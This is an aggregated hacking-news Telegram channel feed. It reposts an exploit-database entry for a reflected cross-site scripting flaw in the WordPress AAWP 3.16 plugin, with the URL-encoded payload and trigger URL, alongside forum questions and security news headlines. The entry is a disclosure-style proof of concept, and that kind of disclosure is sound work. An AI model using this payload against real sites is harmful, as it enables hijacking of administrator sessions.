Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress AAWP 3.16 Cross Site Scripting

https://2.bp.blogspot.com/-DNFQNR6e8p4/WWlvIe_2SVI/AAAAAAAAILs/sd08rXaHefk0y1DdsYY6dPeiz0i718ntQCLcBGAs/s1600/h143.png
WordPress AAWP plugin version 3.16 suffers from a cross site scripting vulnerability.

MD5 | 1dd2000d7305a551456328c47722894f

Download
# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
# Date: 04/01/2022
# Exploit Author: Andrea Bocchetti
# Vendor Homepage: https://getaawp.com/
# Software Link: https://getaawp.com/
# Version: 3.16
# Tested on: Windows 10 - Chrome, WordPress 5.8.2

# Proof of Concept:
# 1- Install and activate AAWP 3.16 plugin.
# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
# 4- XSS has been triggered.

# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"
XSS will trigger.


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Good videos on Linux directories

Anyone have any recommendations for videos in regards to the Linux file directory system

Mostly pertaining to Kali-Linux

Thanks

submitted by /u/madame-succubus
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
The World Is Increasingly Controlled and Transformed by Algorithms

Our digital interactions are being analyzed, predicted, and protected by algorithms and serve as a strategic, digital arsenal in defending against cyberattacks.
Dark Reading: Attacks/Breaches
Putting Ransomware Gangs Out of Business With AI

Organizations need to take matters into their own hands with a new approach.
Dark Reading: Attacks/Breaches
Why We Need To Reframe the False-Positive Problem

Efforts to tune or build behavior- or signature-based threat identification requires time and effort most organizations don't have.
hacking: security in practice
Is "The Web Application Hacker's Handbook" still relevant?

I was watching a bug bounty youtube video and the guy recommended this book, specifically "The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 2nd Edition." It seems good, but it was written in 2011. Is it still usable? Are there any better alternatives?

submitted by /u/bbbcsgalcm
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Have people ever been arrested for cryptojacking botnet?

After several searches, I have only found cases of people targeting companies that have had legal repercussions.

But those who were doing it on private individuals only seem to have remained in the dark.

Have there been any notable cases of cryptojacker botnets being stopped by the authorities?

submitted by /u/Affectionate-Lack784
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Which Cloud Strategy Is Right For My Organization's Security Needs?

The massive Amazon Web Services outage in December had many security leaders asking whether they should be going multicloud or multiregion for their cloud environments.
Dark Reading: Attacks/Breaches
New Attack Campaign Exploits Microsoft Signature Verification

The Malsmoke attack group is behind a campaign that has exploited the Microsoft e-signature verification tool to target 2,100 victims.